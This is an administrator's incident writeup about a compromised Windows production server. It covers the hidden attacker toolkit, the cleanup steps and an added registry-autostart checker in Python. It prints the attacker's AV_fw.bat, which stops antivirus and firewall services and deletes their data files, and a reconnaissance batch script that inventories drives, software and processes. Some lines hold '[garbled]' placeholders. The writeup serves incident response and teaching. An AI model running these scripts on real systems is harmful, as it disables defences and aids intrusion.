In the morning I found that Host Monitor was reporting "No Answer" for the Web Server and SQL Server. I remoted into the machine; AVG's scheduled scan report said that C:\Winnt\System32\spool\Help\SECURE.BAT contained a virus. On checking I found a hidden Help directory under C:\WinNT\SYSTEM32\SPOOL\, so I took a screenshot with Alt+Print Screen, then packaged the Help directory and deleted it, and wrote the event into the system operations and maintenance record. Unfortunately the trigger file secure.bat had already been deleted in that first step; the lesson learned afterwards is that when a problem is found, the scene must be preserved before it is dealt with.
Analysis of the contents of HELP (listed below): it is basically information collection, plus a TELSRV program, fully in the spirit of Sun Tzu's Art of War: know the enemy and know yourself, and you will win a hundred battles:
AV_fw.bat: stops various anti-virus and firewall services such as BlackICE, and finally deletes scan history records and virus database files;
fport.exe: collects port information, including the process listening on each port, and saves the result to fport.txt;
regedit.exe: registry editor;
kill.exe: pskill v1.03 - local and remote process killer;
system.bat: reports system information, searches for Serv-U information, and saves the result to SystemInfo.txt;
telsrv.exe: a Telnet server, http://www.pcmicro.com/netfoss/telsrv.html;
Since this server has been handed over to me and is a production server, I went step by step:
※ Searched Google and found Symantec's writeup: http://securityResponse.symantec.com/avCenter/venc/data/backdoor.sumtax.html; followed its instructions to check the relevant places and clean up the registry;
※ Rechecked the services and turned off those that are not needed (while wondering why there were so many messy services);
※ Used %systemroot%\system32\wupdmgr.exe to go to the Microsoft site and apply patches;
※ Changed the SQL Server sa password, changed the local Administrator account and its password as well, and wrote this into the server operations and maintenance report;
※ Killed the suspicious processes and checked the following keys, removing the hacker's suspicious entries:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
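As an added example (not from the original post, and not one of the tools found on the server), the following Python script does the autostart check from the last step against an export made with regedit /e: it parses the .reg file, keeps only the four Run/RunOnce keys, and flags any value whose image runs from the spool directory or carries one of the toolkit filenames listed above. The sample export is constructed for the example.

```python
import re
# Toolkit filenames from the writeup (found under spool\Help on the server).
TOOLKIT_NAMES = {"telsrv.exe", "kill.exe", "fport.exe", "av_fw.bat",
                 "system.bat", "secure.bat"}
# The four autostart keys the writeup says to check (lowercase for comparison).
AUTOSTART_KEYS = {h + "\\software\\microsoft\\windows\\currentversion\\" + v
                  for h in ("hkey_local_machine", "hkey_current_user")
                  for v in ("run", "runonce")}
# One "Name"="data" line of a .reg export; \\ and \" are escapes inside strings.
_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
def _unescape(s):
    return s.replace('\\"', '"').replace("\\\\", "\\")
def parse_reg_export(text):
    """Parse a regedit /e export into {key: {value_name: data}} (string values only)."""
    entries, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            entries.setdefault(current, {})
        elif current is not None and (m := _VALUE_RE.match(line)):
            entries[current][_unescape(m.group(1))] = _unescape(m.group(2))
    return entries
def suspicious_autostarts(entries):
    """Flag autostart values that run from the spool tree or name a toolkit file."""
    findings = []
    for key, values in entries.items():
        if key.lower() not in AUTOSTART_KEYS:
            continue  # not one of the Run/RunOnce keys
        for name, command in values.items():
            cmd = command.strip()
            # Quoted image path, or the first token of an unquoted command line.
            image = cmd[1:].split('"', 1)[0] if cmd.startswith('"') else (cmd.split() or [""])[0]
            if "\\spool\\" in image.lower():
                findings.append((key, name, image, "runs from the print spooler directory"))
            elif image.rsplit("\\", 1)[-1].lower() in TOOLKIT_NAMES:
                findings.append((key, name, image, "known toolkit filename"))
    return findings
# Constructed sample export; not taken from the server in the writeup.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Synchronization Manager"="mobsync.exe /logon"
"Print Spooler Help"="C:\\WINNT\\system32\\spool\\Help\\telsrv.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"AVReset"="C:\\WINNT\\system32\\spool\\Help\\AV_fw.bat"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Process Killer"="\"C:\\Program Files\\Tools\\kill.exe\" -t"
'''
```

Run suspicious_autostarts(parse_reg_export(open("export.reg").read())) on a real export; anything it lists should be compared against the process list and the files on disk before removal.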
AV_fw.bat content:
net stop _avp32.exe /y >> av_fw.txt
net stop _avpcc.exe /y >> av_fw.txt
net stop _avpm.exe /y >> av_fw.txt
net stop [garbled]win32.exe /y >> av_fw.txt
net stop Agnitum Outpost Firewall /y >> av_fw.txt
net stop Anti-Trojan.exe /y >> av_fw.txt
net stop Antivir /y >> av_fw.txt
...
net stop avconsol /y >> av_fw.txt
net stop WebTrap /y >> av_fw.txt
net stop pop3trap /y >> av_fw.txt
del c:\*anti-vir*.dat /s /q >> av_fw.txt
del c:\*chklist*.dat /s /q >> av_fw.txt
del c:\*chklist*.ms /s /q >> av_fw.txt
del c:\*chklist*.cps /s /q >> av_fw.txt
del c:\*chklist*.tav /s /q >> av_fw.txt
...

system.bat content:
@echo off
echo system information: > SystemInfo.txt
echo. >> SystemInfo.txt
echo. >> SystemInfo.txt
echo. >> SystemInfo.txt
echo. >> SystemInfo.txt
echo. >> SystemInfo.txt
#Operating system
echo ___________________ >> SystemInfo.txt
echo Operating System ... >> SystemInfo.txt
echo [garbled] >> SystemInfo.txt
ver >> SystemInfo.txt
#Free space
echo _____________ >> SystemInfo.txt
echo Free Space ... >> SystemInfo.txt
echo [garbled] >> SystemInfo.txt
dir C: | find "Bytes" >> SystemInfo.txt
dir C: | find "Libres" >> SystemInfo.txt
dir D: | find "Bytes" >> SystemInfo.txt
dir D: | find "Libres" >> SystemInfo.txt
dir E: | find "Bytes" >> SystemInfo.txt
dir E: | find "Libres" >> SystemInfo.txt
dir F: | find "Bytes" >> SystemInfo.txt
dir F: | find "Libres" >> SystemInfo.txt
dir G: | find "Bytes" >> SystemInfo.txt
dir G: | find "Libres" >> SystemInfo.txt
dir H: | find "Bytes" >> SystemInfo.txt
dir H: | find "Libres" >> SystemInfo.txt
#Finding servu
echo _______________ >> SystemInfo.txt
echo Finding servu ... >> SystemInfo.txt
echo [garbled] >> SystemInfo.txt
dir /s /a c:\ser*.ini >> SystemInfo.txt
dir /s /a d:\ser*.ini >> SystemInfo.txt
dir /s /a e:\ser*.ini >> SystemInfo.txt
dir /s /a c:\ser*.exe >> SystemInfo.txt
dir /s /a d:\ser*.exe >> SystemInfo.txt
dir /s /a e:\ser*.exe >> SystemInfo.txt
#Finding rar
echo ________________ >> SystemInfo.txt
echo Finding Rar ... >> SystemInfo.txt
echo [garbled] >> SystemInfo.txt
dir /s /a c:\*.rar >> SystemInfo.txt
dir /s /a d:\*.rar >> SystemInfo.txt
dir /s /a e:\*.rar >> SystemInfo.txt
dir /s /a f:\*.rar >> SystemInfo.txt
dir /s /a g:\*.rar >> SystemInfo.txt
dir /s /a h:\*.rar >> SystemInfo.txt
#Finding mp3
echo ________________ >> SystemInfo.txt
echo Finding Mp3 ... >> SystemInfo.txt
echo [garbled] >> SystemInfo.txt
dir /s /a c:\*.mp3 >> SystemInfo.txt
dir /s /a d:\*.mp3 >> SystemInfo.txt
dir /s /a e:\*.mp3 >> SystemInfo.txt
dir /s /a f:\*.mp3 >> SystemInfo.txt
dir /s /a g:\*.mp3 >> SystemInfo.txt
dir /s /a h:\*.mp3 >> SystemInfo.txt
#Finding nfo
echo _______________ >> SystemInfo.txt
echo Finding nfo ... >> SystemInfo.txt
echo [garbled] >> SystemInfo.txt
dir /s /a c:\*.nfo >> SystemInfo.txt
dir /s /a d:\*.nfo >> SystemInfo.txt
dir /s /a e:\*.nfo >> SystemInfo.txt
dir /s /a f:\*.nfo >> SystemInfo.txt
dir /s /a g:\*.nfo >> SystemInfo.txt
dir /s /a h:\*.nfo >> SystemInfo.txt
#Finding ftp.exe
echo ________________ >> SystemInfo.txt
echo Finding ftp ... >> SystemInfo.txt
echo [garbled] >> SystemInfo.txt
dir /s /a c:\ftp.exe >> SystemInfo.txt
dir /s /a d:\ftp.exe >> SystemInfo.txt
dir /s /a e:\ftp.exe >> SystemInfo.txt
dir /s /a f:\ftp.exe >> SystemInfo.txt
dir /s /a g:\ftp.exe >> SystemInfo.txt
dir /s /a h:\ftp.exe >> SystemInfo.txt
#Finding tftp.exe
echo ________________ >> SystemInfo.txt
echo Finding TFTP ... >> SystemInfo.txt
echo [garbled] >> SystemInfo.txt
dir /s /a c:\tftp.exe >> SystemInfo.txt
dir /s /a d:\tftp.exe >> SystemInfo.txt
dir /s /a e:\tftp.exe >> SystemInfo.txt
dir /s /a f:\tftp.exe >> SystemInfo.txt
dir /s /a g:\tftp.exe >> SystemInfo.txt
dir /s /a h:\tftp.exe >> SystemInfo.txt
#Finding firedaemon.exe
echo ________________ >> SystemInfo.txt
echo Finding Firedaemon ... >> SystemInfo.txt
echo [garbled] >> SystemInfo.txt
dir /s /a c:\firedaemon.exe >> SystemInfo.txt
dir /s /a d:\firedaemon.exe >> SystemInfo.txt
dir /s /a e:\firedaemon.exe >> SystemInfo.txt
dir /s /a f:\firedaemon.exe >> SystemInfo.txt
dir /s /a g:\firedaemon.exe >> SystemInfo.txt
dir /s /a h:\firedaemon.exe >> SystemInfo.txt
#Finding ioftpd
echo ________________ >> SystemInfo.txt
echo Finding ioftpd ... >> SystemInfo.txt
echo [garbled] >> SystemInfo.txt
dir /s /a c:\io*.ini >> SystemInfo.txt
dir /s /a d:\io*.ini >> SystemInfo.txt
dir /s /a c:\io*.exe >> SystemInfo.txt
dir /s /a d:\io*.exe >> SystemInfo.txt
dir /s /a c:\rai*.ini >> SystemInfo.txt
dir /s /a d:\rai*.ini >> SystemInfo.txt
dir /s /a c:\rai*.exe >> SystemInfo.txt
dir /s /a d:\rai*.exe >> SystemInfo.txt
#Finding sub0t.ini
echo ________________ >> SystemInfo.txt
echo Finding Sub0t.ini ... >> SystemInfo.txt
echo [garbled] >> SystemInfo.txt
dir /s /a c:\sub0t.ini >> SystemInfo.txt
dir /s /a d:\sub0t.ini >> SystemInfo.txt
dir /s /a e:\sub0t.ini >> SystemInfo.txt
dir /s /a c:\svrany.exe >> SystemInfo.txt
dir /s /a d:\svrany.exe >> SystemInfo.txt
#Finding ftpc.exe
echo ________________ >> SystemInfo.txt
echo Finding ftpc.exe ... >> SystemInfo.txt
echo [garbled] >> SystemInfo.txt
dir /s /a c:\ftpc.exe >> SystemInfo.txt
dir /s /a d:\ftpc.exe >> SystemInfo.txt
dir /s /a e:\ftpc.exe >> SystemInfo.txt
dir /s /a f:\ftpc.exe >> SystemInfo.txt
dir /s /a g:\ftpc.exe >> SystemInfo.txt
dir /s /a h:\ftpc.exe >> SystemInfo.txt
#Running services
echo ___________________ >> SystemInfo.txt
echo Running Services ... >> SystemInfo.txt
echo [garbled] >> SystemInfo.txt
#Running services
echo ______ >> SystemInfo.txt
echo set ... >> SystemInfo.txt
echo [garbled] >> SystemInfo.txt
set >> SystemInfo.txt
#Installed software
echo _____________________ >> SystemInfo.txt
echo Installed Software ... >> SystemInfo.txt
echo [garbled] >> SystemInfo.txt
start /wait regedit /e %TEMP%\tmp HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall
find "DisplayName" < %TEMP%\tmp | find /v "QuietDisplayName" >> SystemInfo.txt
del %TEMP%\tmp
#Installed software
echo ___________ >> SystemInfo.txt
echo net stat ... >> SystemInfo.txt
echo [garbled] >> SystemInfo.txt
netstat >> SystemInfo.txt
#Running processes
echo ____________________ >> SystemInfo.txt
echo Running Processes ... >> SystemInfo.txt
echo [garbled] >> SystemInfo.txt
tasklist /svc >> SystemInfo.txt
#System info
echo ______________ >> SystemInfo.txt
echo System Info ... >> SystemInfo.txt
echo [garbled] >> SystemInfo.txt
echo. >> SystemInfo.txt
echo. >> SystemInfo.txt